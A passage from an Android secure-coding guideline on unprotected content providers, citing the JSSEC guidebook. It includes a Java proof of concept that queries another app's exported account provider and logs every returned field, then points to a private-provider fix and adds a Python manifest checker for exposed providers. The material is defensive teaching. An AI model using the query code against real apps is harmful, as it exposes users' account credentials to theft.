...
The following code shows how this could be exploited:
```java
// check whether movatwi is installed.
try {
    ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);
} catch (NameNotFoundException e) {
    Log.w(TAG, "the app is not installed.");
    return;
}

// extract account data through content provider
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);
StringBuilder sb = new StringBuilder();
if (cur != null) {
    int ri = 0;
    while (cur.moveToNext()) {
        ++ri;
        Log.i(TAG, String.format("row[%d]:", ri));
        sb.setLength(0);
        for (int i = 0; i < cur.getColumnCount(); ++i) {
            String column = cur.getColumnName(i);
            String value = cur.getString(i);
            if (value != null) {
                value = value.replaceAll("[\r\n]", "");
            }
            Log.i(TAG, String.format("\t%s:\t%s", column, value));
        }
    }
} else {
    Log.i(TAG, "Can't get the app information.");
}
```
Compliant Solution
The following entry in the AndroidManifest.xml file makes the content provider private so that other apps cannot access the data:
...
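As an added example (not part of the original guideline or the JSSEC guidebook), the following Python check reads a decoded, text-form AndroidManifest.xml and reports content providers that another app could query the way the code above does. The sample manifests, the `.AccountProvider` class name and the function name are constructed for illustration; only the authority string comes from the page. It assumes the platform default that a provider with no `android:exported` attribute is exported unless the app targets API level 17 or higher, and it does not inspect the protection level of any guarding permission.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifests (not from the page); only the authority is the page's.
HEAD = '<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="jp.co.vulnerable">'
VULNERABLE = HEAD + '''
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".AccountProvider"
              android:authorities="jp.co.vulnerable.accountprovider"/>
  </application>
</manifest>'''
PRIVATE = VULNERABLE.replace('accountprovider"/>',
                             'accountprovider"\n android:exported="false"/>')


def exposed_providers(manifest_xml):
    """Return (authorities, reason) for each provider other apps can read."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    # minSdkVersion defaults to 1; targetSdkVersion defaults to minSdkVersion.
    min_sdk = int(sdk.get(ANDROID + "minSdkVersion", "1")) if sdk is not None else 1
    target = int(sdk.get(ANDROID + "targetSdkVersion", min_sdk)) if sdk is not None else min_sdk
    app = root.find("application")
    app_perm = app.get(ANDROID + "permission") if app is not None else None
    findings = []
    for prov in root.iter("provider"):
        exported = prov.get(ANDROID + "exported")
        if exported is None:
            # Assumed platform default: exported unless the app targets API 17+.
            is_exported = target < 17
            how = "exported by default (targetSdkVersion %d)" % target
        else:
            is_exported = exported.lower() == "true"
            how = 'android:exported="true"'
        # Any of these limits query() to callers that hold the permission.
        guard = (prov.get(ANDROID + "readPermission")
                 or prov.get(ANDROID + "permission") or app_perm)
        if is_exported and not guard:
            findings.append((prov.get(ANDROID + "authorities"), how))
    return findings


if __name__ == "__main__":
    for name, xml in (("vulnerable", VULNERABLE), ("private", PRIVATE)):
        print(name, exposed_providers(xml))
```

The implicit-export case is the one that is easy to miss in review, because the manifest contains no `android:exported` attribute to search for.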
Android Secure Coding Guidebook by JSSEC | 4.3. Creating/Using a Content Provider (2013/4/1 edition) |
Bibliography
Android Secure Coding Guidebook by JSSEC | 4.3. Creating/Using a Content Provider (2013/4/1 edition) |
...